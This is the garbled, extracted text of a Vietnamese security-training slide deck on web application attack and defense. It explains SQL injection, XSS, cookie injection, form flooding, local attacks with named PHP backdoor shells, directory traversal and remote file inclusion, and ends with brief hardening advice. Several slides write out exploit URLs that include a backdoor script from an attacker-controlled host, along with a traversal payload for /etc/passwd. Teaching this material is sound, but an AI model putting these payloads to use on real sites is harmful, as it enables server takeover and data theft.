Đang tải... (xem toàn văn)
Bài giảng Web application attack & defense gồm có những chủ đề chính sau: Web app, Webserver: Các khái niệm và mô hình; giới thiệu một số phương pháp attack cơ bản nhắm vào web app/webserver; phát hiện và phòng chống. Mời các bạn tham khảo.
Web Application Attack & Defense Trình bày : Võ Đỗ Thắng Giám đốc Trung tâm an ninh mạng Athena A Web app, Webserver: Các khái niệm mơ hình B Giới thiệu số phương pháp attack nhắm vào web app/webserver C Phát phòng chống ATHENA A Web app, Webserver: Các khái niệm mô hình Web application gì? Web app hay web service phần mềm ứng dụng chạy phía server (thuộc layer mơ hình OSI) User truy xuất web app trình duyệt (web browser, telnet) hay giao thức HTTP(s) ATHENA 2001(c)WhiteHat Security, Inc A • • ATHENA Web app, Webserver: Các mơ hình Một số trình duyệt thơng dụng: IE (internet explorer) FF( Mozilla Firefox) Opera Một số webserver thông dụng IIS : www.microsoft.com Apache : www.apache.org Jrun : www.marcomedia.com Tomcat jakarta.apache.org Iplanet webserver Cold Fusion Webserver 2001(c)WhiteHat Security, Inc khái niệm Mơ hình chuẩn Web App HTTP request (cleartext or SSL) Web Client SQL Databas e Firewall Web app Web Server Web app Web app Web app HTTP reply (HTML, Javascript, VBscript, etc) ATHENA •Apache •IIS •Netscape etc… Plugins: •Perl •C/C++ •JSP, etc DB DB Database connection: •ADO, •ODBC, etc FIREWALL ATHENA 2001(c)WhiteHat Security, Inc SSL ATHENA 2001(c)WhiteHat Security, Inc ATHENA 2001(c)WhiteHat Security, Inc B Giới thiệu số phương pháp attack nhắm vào web app/webserver Google attack SQL injection Cross site scripting Hidden form vulnerability Cookies injection Flood database/Flood form Local Attack Path disclosure/Parsing exploit Dictionary Traversal 10 Remote include file 11 Secured webserver ATHENA 2001(c)WhiteHat Security, Inc Demo: Website viện kinh tế thành phố Hồ Chí Minh bị cơng, chiếm quyền kiểm sốt ATHENA Cookies injection Cookie gì? - Cookie phần liệu nhỏ có cấu trúc chia sẻ web site browser người dùng cookies lưu trữ file liệu nhỏ dạng text (size 4k) Chúng site tạo để lưu trữ/truy tìm/nhận biết thơng tin người dùng ghé thăm site vùng mà họ qua site - Những thông tin bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen…Trong số trường hợp, cookie hiểu token để Authentication người dùng - Ngòai cách cơng XSS để lấy cookie victim, Hacker dùng kĩ thuật gọi “cookie injection” để chiếm lấy phiên làm việc victim thông qua vài chỗ yếu cách xác thực cookies ATHENA 2001(c)WhiteHat Security, Inc (Xem video cookie_injection) Flood database/Flood form Flood database/ Flood form gì: - Đây thực khơng phải phương pháp hacking, tạm xếp vào hình thức DoS, hình thức DoS vào database - Cách thức công: Hacker tạo script để post cách tự động vào forum, create member, search form, feedback đến lúc webserver victim cạn kiệt bandwitch hay nở liên tục DB khiến dung lượng ổ cứng victim bị full crash hệ thống - Xem Flood blog_yahoo_demo ATHENA 2001(c)WhiteHat Security, Inc Local attack - Là phương pháp attack hacker hosting server với victim - Công cụ sử dụng chủ yếu dùng script backdoor (như r57shell.php, c99.php, remview.php) hay ASP (Ntdady.asp, 4in1.asp ) - Phương pháp lợi hại, biến hóa khơn lường - Rất nhiều Hosting giới bị exploit qua phương pháp này, số Hosting tiếng vietnam bị (VDC, FPT…etc) (xem demo local_basic_att, hosting.vnn.vn, root_linux) ATHENA Path disclosure/parsing exploit - Thường gọi tên khác lỗi “lộ đường dẫn” - Được đánh giá lỗi có độ nguy hiểm trung bình (vì có giá trị cơng localhost biết đường dẫn victim) - Tuy nhiên lại nguy hiểm để lộ đường dẫn dẫn đến folder chứa database - Riêng trường hợp parsing exploit cần kết hợp điều kiện webserver xài IIS 5.x phân ASP coding bị lỗi sử dụng phương pháp Server.MapPath (xem parsing_exploit) ATHENA Dictionary Traversal - Hay gọi Path tranversal, mức độ nguy hiểm tùy thuộc vào nhiều tình cụ thể - Xét vd: Giả sử có site bán máy cho phép client download file tài liệu hướng dẫn sử dụng sản phẩm Họ dùng file download.php sử dụng sau: http://[target.com]/download/download.ph p?file=xyz.pdf ATHENA Dictionary Traversal (cont) $fp = fopen($file, 'r'); fpassthru($fp); // ** CORRECT ** fclose($fp); ?> ko bị lỗi, ATHENA Remote include file Khi hacker include vào file: http://www.[target].com/test.php?ex=http://www.[attacker].com/ Khi link include http://www.[attacker].com/index.php Index.php backdoor lưu host hacker (host hacker ko support php) Hoặc attacker dùng cách khác http://www.[target].com/test.php?ex=http://www.[attacker].com/ backdoor.php (đằng sau dấu ? Sẽ ignore tất cả, trường hợp ignore /index.php có sẵn code test.php victim) ATHENA Remote include file b/ Lỗi File include thông qua isset(), if() Test1.php ATHENA Remote include file Test2.php if (!isset( $path )) $path = `/home/`; include(“$path/index.php”); […] ?> Cách khai thác: http://www.[target].com/test1.php?file=http://www.[at tacker].com/remview.php http://www.[target].com/test2.php?path=http://www.[ attacker].com/remview.php? ATHENA Remote include file Test3.php Cách khai thác http://www.[target].com/test3.php?file= / / / / / / / /etc/passwd ATHENA How to Secure? Cẩn thận trình coding, viết rules hợp lý để validate tất biến đầu vào Thường xuyên Update hotfix, service patch cho Webserver, OS Dùng mod_security tường lửa web để chặn công Thiết lập hệ thống mạng an tòan Dùng SSL, tránh sniff đường truyền, dùng Snort để logging … ATHENA Tài liệu tham khảo ATHENA Trung Tâm Đào Tạo Quản Trị & An Ninh Mạng Athena Bis Đinh Tiên Hoàng, Phường ĐaKao, Quận Website : www.athena.edu.vn Tel: 8244041 ATHENA ...A Web app, Webserver: Các khái niệm mơ hình B Giới thiệu số phương pháp attack nhắm vào web app/webserver C Phát phòng chống ATHENA A Web app, Webserver: Các khái niệm mô hình Web application. .. Iplanet webserver Cold Fusion Webserver 2001(c)WhiteHat Security, Inc khái niệm Mơ hình chuẩn Web App HTTP request (cleartext or SSL) Web Client SQL Databas e Firewall Web app Web Server Web app Web. .. = $file; header("Cache-control: private"); // fix for IE header("Content-Type: application/ octet-stream"); header("Content-Length: ".filesize($filename)); header("Content-Disposition: attachment;